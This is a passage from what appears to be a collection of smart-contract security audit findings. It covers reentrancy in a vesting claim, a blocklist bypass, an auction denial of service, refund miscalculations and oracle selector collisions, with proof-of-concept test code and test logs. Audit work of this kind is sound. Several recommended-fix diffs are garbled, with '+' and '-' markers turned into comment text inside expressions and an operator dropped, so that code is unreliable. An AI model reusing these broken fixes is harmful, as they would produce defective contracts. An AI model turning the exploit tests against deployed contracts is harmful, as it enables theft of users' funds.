vm.timeTravel(120);\\n\\n \\n\\n vm.startPrank(governanceTimelockAddress);\\n locking.stop();\\n vm.stopPrank();\\n\\n uint bal2 = mentoToken.balanceOf(alice);\\n console.log(bal2);\\n\\n vm.startPrank(alice);\\n locking.withdraw();\\n vm.stopPrank();\\n\\n vm.startPrank(governanceTimelockAddress);\\n locking.start();\\n vm.stopPrank();\\n\\n uint bal = mentoToken.balanceOf(alice);\\n console.log(bal);\\n vm.prank(alice);\\n \\n\\n console.log(mentoGovernor.castVote(proposalId, 1));\\n }\\n```\\n\\nYou can see the Alice withdrew her entire locked amount and still was able to caste her vote.чWhen the entire amount is withdrawn adjust the logic to remove the corresponding lines for the delegator.чUser still able to vote even when the entire locked amount is withdrawn.ч```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n -Auction fails if the 'Honorarium Rate' is 0%чmediumчThe Honorarium Rate is the required percentage of a winning Auction Pitch bid that the Steward makes to the Creator Circle at the beginning of each Stewardship Cycle.\\n`$$ Winning Bid * Honorarium Rate = Periodic Honorarium $$`\\nTo mimic the dynamics of private ownership, the Creator Circle may choose a 0% Honorarium Rate. However, doing so breaks the functionality of the protocol.\\nTo place a bid, a user must call the `placeBid` function in `EnglishPeriodicAuctionFacet.sol` and deposit collateral(collateralAmount) equal to `bidAmount + feeAmount`. The `feeAmount` here represents the Honorarium Rate mentioned above. 
The `placeBid` function calls the `_placeBid` internal function in `EnglishPeriodicAuctionInternal.sol` which calculates the `totalCollateralAmount` as follows :\\n```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n\\nHere, `bid.collateralAmount` is the cumulative collateral deposited by the bidder in previous bids during the current auction round(i.e, zero if no bids were placed), and `collateralAmount` is the collateral to be deposited to place the bid. However the `_placeBid` function requires that `totalCollateralAmount` is strictly greater than `bidAmount` if the bidder is not the current owner of the Stewardship License. This check fails when the `feeAmount` is zero and this causes a Denial of Service to users trying to place a bid. Even if the users try to bypass this by depositing a value slightly larger than `bidAmount`, the `_checkBidAmount` function would still revert with `'Incorrect bid amount'`\\nPOC\\nThe following test demonstrates the above-mentioned scenario :\\n```\\n describe('exploit', function () {\\n it('POC', async function () {\\n // Auction start: Now + 100\\n // Auction end: Now + 400\\n const instance = await getInstance({\\n auctionLengthSeconds: 300,\\n initialPeriodStartTime: (await time.latest()) + 100,\\n licensePeriod: 1000,\\n });\\n const licenseMock = await ethers.getContractAt(\\n 'NativeStewardLicenseMock',\\n instance.address,\\n );\\n\\n // Mint token manually\\n const steward = bidder2.address;\\n await licenseMock.mintToken(steward, 0);\\n\\n // Start auction\\n await time.increase(300);\\n \\n const bidAmount = ethers.utils.parseEther('1.0');\\n const feeAmount = await instance.calculateFeeFromBid(bidAmount);\\n const collateralAmount = feeAmount.add(bidAmount);\\n\\n // Reverts when a user tries to place a bid\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount })).to.be.revertedWith('EnglishPeriodicAuction: Collateral must be greater 
than current bid');\\n\\n \\n \\n const extraAmt = ethers.utils.parseEther('0.1');\\n const collateralAmount1 = feeAmount.add(bidAmount).add(extraAmt);\\n \\n // Also reverts when the user tries to deposit collateral slighty greater than bid amount\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount1 })).to.be.revertedWith('EnglishPeriodicAuction: Incorrect bid amount'); \\n \\n // Only accepts a bid from the current steward\\n \\n await expect( instance\\n .connect(bidder2)\\n .placeBid(0, bidAmount, { value: 0 })).to.not.be.reverted;\\n\\n });\\n });\\n```\\n\\nTo run the test, copy the code above to `EnglishPeriodicAuction.ts` and alter L#68 as follows :\\n```\\n// Remove the line below\\n [await owner.getAddress(), licensePeriod, 1, 10],\\n// Add the line below\\n [await owner.getAddress(), licensePeriod, 0, 10],\\n```\\n\\nRun `yarn run hardhat test --grep 'POC'`чAlter EnglishPeriodicAuctionInternal.sol::L#330 as follows :\\n```\\n// Remove the line below\\n totalCollateralAmount > bidAmount,\\n// Add the line below\\n totalCollateralAmount >= bidAmount, \\n```\\nчThe protocol becomes dysfunctional in such a scenario as users as DOS'd from placing a bid.ч```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n -Currently auctioned NFTs can be transferred to a different address in a specific edge caseчmediumчCurrently auctioned NFTs can be transferred to a different address in a specific edge case, leading to theft of funds.\\nThe protocol assumes that an NFT cannot change owner while it's being auctioned, this is generally the case but there is an exception, an NFT can change owner via mintToken() while an auction is ongoing when all the following conditions apply:\\nAn NFT is added `to` the collection without being minted (ie. 
`to` set `to` address(0)).\\nThe NFT is added `to` the collection with the parameter `tokenInitialPeriodStartTime[]` set `to` a timestamp lower than `l.initialPeriodStartTime` but bigger than 0(ie. `0` < `tokenInitialPeriodStartTime[]` < l.initialPeriodStartTime).\\nThe current `block.timestamp` is in-between `tokenInitialPeriodStartTime[]` and `l.initialPeriodStartTime`.\\nA malicious `initialBidder` can take advantage of this by:\\nBidding on the new added NFT via placeBid().\\nCalling mintToken() to transfer the NFT to a different address he controls.\\nClosing the auction via closeAuction()\\nAt point `3.`, because the NFT owner changed, the winning bidder (ie. initialBidder) is not the current NFT owner anymore. This will trigger the following line of code:\\n```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n\\nWhich increases the `availableCollateral` of the `oldBidder` (ie. the address that owns the NFT after point 2.) by `bidAmount` of the highest bid. But because at the moment the highest bid was placed `initialBidder` was also the NFT owner, he only needed to transfer the `ETH` fee to the protocol instead of the whole bid amount.\\nThe `initialBidder` is now able to extract ETH from the protocol via the address used in point `2.` by calling withdrawCollateral() while also retaining the NFT license.чDon't allow `tokenInitialPeriodStartTime[]` to be set at a timestamp beforel.initialPeriodStartTime.чMalicious initial bidder can potentially steal ETH from the protocol in an edge case. 
If the `ADD_TOKEN_TO_COLLECTION_ROLE` is also malicious, it's possible to drain the protocol.ч```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n -Tax refund is calculated based on the wrong amountчhighчTax refund is calculated based on the wrong amount\\nAfter the private period has finished, users can claim a tax refund, based on their max tax free allocation.\\n```\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n\\nThe problem is that in case `s.share > taxFreeAllc`, the tax refund is calculated wrongfully. Not only it should refund the tax on the unused USDC amount, but it should also refund the tax for the tax-free allocation the user has.\\nImagine the following.\\nUser deposits 1000 USDC.\\nPrivate period finishes, token oversells. Only half of the user's money actually go towards the sell (s.share = 500 USDC, s.left = 500 USDC)\\nThe user has 400 USDC tax-free allocation\\nThe user must be refunded the tax for the 500 unused USDC, as well as their 400 USDC tax-free allocation. In stead, they're only refunded for the 500 unused USDC. 
(note, if the user had 500 tax-free allocation, they would've been refunded all tax)чchange the code to the following:\\n```\\n refundTaxAmount = ((left + taxFreeAllc) * tax) / POINT_BASE;\\n```\\nчUsers are not refunded enough taxч```\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n -Vesting contract cannot work with ETH, although it's supposed to.чmediumчVesting contract cannot work with native token, although it's supposed to.\\nWithin the claim function, we can see that if `token` is set to address(1), the contract should operate with ETH\\n```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\"); // @audit - here\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nHowever, it is actually impossible for the contract to operate with ETH, since `updateUserDeposit` always attempts to do a token transfer.\\n```\\n function updateUserDeposit(\\n address[] memory _users,\\n 
uint256[] memory _amount\\n ) public onlyRole(DEFAULT_ADMIN_ROLE) {\\n require(_users.length <= 250, \"array length should be less than 250\");\\n require(_users.length == _amount.length, \"array length should match\");\\n uint256 amount;\\n for (uint256 i = 0; i < _users.length; i++) {\\n userdetails[_users[i]].userDeposit = _amount[i];\\n amount += _amount[i];\\n }\\n token.safeTransferFrom(distributionWallet, address(this), amount); // @audit - this will revert\\n }\\n```\\n\\nSince when the contract is supposed to work with ETH, token is set to address(1), calling `safeTransferFrom` on that address will always revert, thus making it impossible to call this function.чmake the following check\\n```\\n if (address(token) != address(1)) token.safeTransferFrom(distributionWallet, address(this), amount);\\n```\\nчVesting contract is unusable with ETHч```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\"); // @audit - here\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n -If token does not oversell, users cannot claim tax refund on their tax free allocation.чhighчUsers may not be able to claim tax refund\\nWithin TokenSale, upon depositing users, users have to pay tax. 
Then, users can receive a tax-free allocation - meaning they'll be refunded the tax they've paid on part of their deposit.\\nThe problem is that due to a unnecessary require check, users cannot claim their tax refund, unless the token has oversold.\\n```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, \"TokenSale: No Deposit\"); \\n require(!s.claimed, \"TokenSale: Already Claimed\");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\"); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n\\n```\\n function _claim(Staked memory _s) internal view returns (uint120, uint256) {\\n uint256 left;\\n if (state.totalPrivateSold > (state.totalSupplyInValue)) {\\n uint256 rate = (state.totalSupplyInValue * PCT_BASE) /\\n state.totalPrivateSold;\\n _s.share = uint120((uint256(_s.amount) * rate) / PCT_BASE);\\n left = uint256(_s.amount) - uint256(_s.share);\\n } else {\\n _s.share = uint120(_s.amount);\\n }\\n\\n return (_s.share, left);\\n }\\n```\\n\\n`left` only has value if the token has oversold. 
Meaning that even if the user has an infinite tax free allocation, if the token has not oversold, they won't be able to claim a tax refund.чRemove the require checkчloss of fundsч```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, \"TokenSale: No Deposit\"); \\n require(!s.claimed, \"TokenSale: Already Claimed\");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\"); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n -Reentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(i)чhighчReentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(I)\\nHere is the Vesting.sol:claim() function:\\n```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n 
}\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\");\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nFrom the above, You'll notice the claim() function checks if the caller already claimed by checking if the s.index has already been set to vestingPoints.length. You'll also notice the claim() function executes .call() and transfer the amount to the caller before setting the s.index = uint128(i), thereby allowing reentrancy.\\nLet's consider this sample scenario:\\nAn attacker contract(alice) has some native pctAmount to claim and calls `claim()`.\\n\"already claimed\" check will pass since it's the first time she's calling `claim()` so her s.index hasn't been set\\nHowever before updating Alice s.index, the Vesting contract performs external .call() to Alice with the amount sent as well\\nAlice reenters `claim()` again on receive of the amount\\nbypass index \"already claimed\" check since this hasn't been updated yet\\ncontract performs external .call() to Alice with the amount sent as well again,\\nSame thing happens again\\nAlice ends up draining the Vesting contractчHere is the recommended fix:\\n```\\nif (pctAmount != 0) {\\n// Add the line below\\n s.index = uint128(i);\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\");\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n// Remove the line below\\n s.index = uint128(i);\\n s.amountClaimed // Add the line below\\n= pctAmount;\\n }\\n```\\n\\nI'll also recommend using reentrancyGuard.чReentrancy in Vesting.sol:claim() will allow users to drain the contractч```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n 
require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\");\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n -Blocklisted investors can still claim USDC in `TokenSale.sol`чmediumчA wrong argument is passed when checking if a user is blacklisted for claiming in `TokenSale.claim()`. Because the check is insufficient, blocked users can claim their USDC.\\n`Admin.setClaimBlock()` blocks users from claiming. The function accepts the address of the user to be blocked and adds it to the `blockClaim` mapping.\\n```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n\\nThe check in `Admin.claim()` wrongly passes `address(this)` as argument when calling `Admin.blockClaim`.\\n```\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n```\\n\\nIn this context, `address(this)` will be the address of the token sale contract and the require statement can be bypassed even by a blocked user.чPass the address of the user.\\n```\\n require(\\n// Remove the line below\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n// Add the line below\\n uint8(epoch) > 1 && !admin.blockClaim(msg.sender)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n```\\nчThe whole functionality for blocking claims doesn't work properly.ч```\\n 
/**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n -Max allocations can be bypassed with multiple addresses because of guaranteed allocationsчmediumч`TokenSale._processPrivate()` ensures that a user cannot deposit more than their allocation amount. However, each address can deposit up to at least `maxAllocations`. This can be leveraged by a malicious user by using different addresses to claim all tokens without even staking.\\nThe idea of the protocol is to give everyone the right to have at least `maxAlocations` allocations. By completing missions, users level up and unlock new tiers. This process will be increasing their allocations. The problem is that when a user has no allocations, they have still a granted amount of `maxAllocations`.\\n`TokenSale.calculateMaxAllocation` returns $max(maxTierAlloc(), maxAllocation)$\\nFor a user with no allocations, `_maxTierAlloc()` will return 0. The final result will be that this user have `maxAllocation` allocations (because `maxAllocation` > 0).\\n```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n\\nMultiple Ethereum accounts can be used by the same party to take control over the IDO and all its allocations, on top of that without even staking.\\nNOTE: setting `maxAllocation = 0` is not a solution in this case because the protocol wants to still give some allocations to their users.чA possible solution may be to modify `calculateMaxAllocation` in the following way:\\n```\\n function calculateMaxAllocation(address _sender) public returns (uint256) {\\n uint256 userMaxAllc = _maxTierAllc(_sender);\\n// Add the line below\\n if (userMaxAllc == 0) return 0;\\n\\n if (userMaxAllc > maxAllocation) {\\n return userMaxAllc;\\n } else {\\n return maxAllocation;\\n }\\n }\\n```\\nчBuying all allocations without staking. 
This also violates a key property that only ION holders can deposit.ч```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n -Potential damages due to incorrect implementation of the ````ZIP```` algorithmчmediumч`WooracleV2_2.fallback()` is used to post zipped token price and state data to the contract for sake of gas saving. However, the first 4 bytes of zipped data are not reserved to distinguish the `ZIP` call and other normal call's function selector. This would cause `ZIP` calls to be accidentally interpreted as any other functions in the contract, result in unintended exceptions and potential damages.\\nAccording solidity's official doc, there are two forms of `fallback()` function `with` or `without` parameter\\n```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n\\nIf the version with parameters is used, _input will contain the full data sent to the contract (equal to msg.data)\\nAs the `_input` data is equal to `msg.data`, the solidity compiler would firstly check if first 4 bytes matches any normal function selectors, and would only execute `fallback(_input)` while no matching. Therefore, in zipped data, the first 4 bytes must be set to some reserved function selector, such as `0x00000000`, with no collision to normal function selectors. 
And the real zipped data then starts from 5th byte.\\nThe following coded PoC shows cases that the zipped data is accidentally interpreted as:\\nfunction renounceOwnership(); function setStaleDuration(uint256); function postPrice(address,uint128); function syncTS(uint256);\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from \"../../lib/forge-std/src/Test.sol\";\\nimport {console2} from \"../../lib/forge-std/src/console2.sol\";\\nimport {WooracleV2_2} from \"../../contracts/wooracle/WooracleV2_2.sol\";\\n\\ncontract WooracleZipBugTest is Test {\\n WooracleV2_2 public oracle;\\n\\n function setUp() public {\\n oracle = new WooracleV2_2();\\n }\\n\\n function testNormalCase() public {\\n /* reference:\\n File: test\\typescript\\wooraclev2_zip_inherit.test.ts\\n 97: function _encode_woo_price() {\\n op = 0\\n len = 1\\n (base, p)\\n base: 6, woo token\\n price: 0.23020\\n 23020000 (decimal = 8)\\n */\\n uint8 base = 6;\\n bytes memory zip = _makeZipData({\\n op: 0,\\n length: 1,\\n leadingBytesOfBody: abi.encodePacked(base, uint32((2302 << 5) + 4))\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n address wooAddr = oracle.getBase(6);\\n (uint256 price, bool feasible) = oracle.price(wooAddr);\\n assertEq(price, 23020000);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithRenounceOwnership() public {\\n // selector of \"renounceOwnership()\": \"0x715018a6\"\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0x31,\\n leadingBytesOfBody: abi.encodePacked(hex\"5018a6\")\\n });\\n assertEq(oracle.owner(), address(this));\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.owner(), address(0));\\n }\\n\\n function testCollisionWithSetStaleDuration() public {\\n // selector of \"setStaleDuration(uint256)\": \"0x99235fd4\"\\n bytes memory zip = _makeZipData({\\n op: 2,\\n length: 0x19,\\n leadingBytesOfBody: abi.encodePacked(hex\"235fd4\")\\n 
});\\n assertEq(oracle.staleDuration(), 120); // default: 2 mins\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n uint256 expectedStaleDuration;\\n assembly {\\n expectedStaleDuration := mload(add(zip, 36))\\n }\\n assertEq(oracle.staleDuration(), expectedStaleDuration);\\n assertTrue(expectedStaleDuration != 120);\\n }\\n\\n function testCollisionWithPostPrice() public {\\n // selector of \"postPrice(address,uint128)\": \"0xd5bade07\"\\n bytes memory addressAndPrice = abi.encode(address(0x1111), uint256(100));\\n bytes memory zip = _makeZipData({\\n op: 3,\\n length: 0x15,\\n leadingBytesOfBody: abi.encodePacked(hex\"bade07\", addressAndPrice)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n (uint256 price, bool feasible) = oracle.price(address(0x1111));\\n assertEq(price, 100);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithSyncTS() public {\\n // selector of \"syncTS(uint256)\": \"4f1f1999\"\\n uint256 timestamp = 12345678;\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0xf,\\n leadingBytesOfBody: abi.encodePacked(hex\"1f1999\", timestamp)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.timestamp(), timestamp);\\n }\\n\\n function _makeZipData(\\n uint8 op,\\n uint8 length,\\n bytes memory leadingBytesOfBody\\n ) internal returns (bytes memory result) {\\n assertTrue(length < 2 ** 6);\\n assertTrue(op < 4);\\n bytes1 head = bytes1(uint8((op << 6) + (length & 0x3F)));\\n uint256 sizeOfItem = op == 0 || op == 2 ? 
5 : 13;\\n uint256 sizeOfHead = 1;\\n uint256 sizeOfBody = sizeOfItem * length;\\n assertTrue(sizeOfBody >= leadingBytesOfBody.length);\\n result = bytes.concat(head, leadingBytesOfBody, _makePseudoRandomBytes(sizeOfBody - leadingBytesOfBody.length));\\n assertEq(result.length, sizeOfHead + sizeOfBody);\\n }\\n\\n function _makePseudoRandomBytes(uint256 length) internal returns (bytes memory result) {\\n uint256 words = (length + 31) / 32;\\n result = new bytes(words * 32);\\n for (uint256 i; i < words; ++i) {\\n bytes32 rand = keccak256(abi.encode(block.timestamp + i));\\n assembly {\\n mstore(add(add(result, 32), mul(i, 32)), rand)\\n }\\n }\\n\\n assembly {\\n mstore(result, length) // change to required length\\n }\\n assertEq(length, result.length);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract WooracleZipBugTest -vv\\n[⠢] Compiling// rest of codeNo files changed, compilation skipped\\n[⠆] Compiling// rest of code\\n\\nRunning 5 tests for test/foundry/WooracleZipBug.t.sol:WooracleZipBugTest\\n[PASS] testCollisionWithPostPrice() (gas: 48643)\\n[PASS] testCollisionWithRenounceOwnership() (gas: 21301)\\n[PASS] testCollisionWithSetStaleDuration() (gas: 18289)\\n[PASS] testCollisionWithSyncTS() (gas: 35302)\\n[PASS] testNormalCase() (gas: 48027)\\nTest result: ok. 
5 passed; 0 failed; 0 skipped; finished in 2.13ms\\n\\nRan 1 test suites: 5 tests passed, 0 failed, 0 skipped (5 total tests)\\n```\\nч```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\nindex 9e66c63..4a9138f 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n@@ // Remove the line below\\n416,9 // Add the line below\\n416,10 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n */\\n\\n uint256 x = _input.length;\\n// Remove the line below\\n require(x > 0, \"WooracleV2_2: !calldata\");\\n// Add the line below\\n require(x > 4, \"WooracleV2_2: !calldata\");\\n// Add the line below\\n require(bytes4(_input[0:4]) == bytes4(hex\"00000000\"));\\n\\n// Remove the line below\\n uint8 firstByte = uint8(bytes1(_input[0]));\\n// Add the line below\\n uint8 firstByte = uint8(bytes1(_input[5]));\\n uint8 op = firstByte 6; // 11000000\\n uint8 len = firstByte & 0x3F; // 00111111\\n\\n@@ // Remove the line below\\n428,12 // Add the line below\\n429,12 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint128 p;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 5:1 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 5 // Add the line below\\n 1:1 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 5:5 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Add the line below\\n p = 
_decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 5 // Add the line below\\n 1:5 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n infos[base].price = p;\\n }\\n\\n// Remove the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 5:1 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 5:5 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n } else if (op == 1 || op == 3) {\\n // post states list\\n address base;\\n@@ // Remove the line below\\n442,14 // Add the line below\\n443,14 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint64 k;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 9:1 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 1:1 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Remove the line below\\n s = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 5:1 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Remove the line below\\n k = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 7:1 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 9:5 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Add the line below\\n p = _decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 1:5 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Add the line 
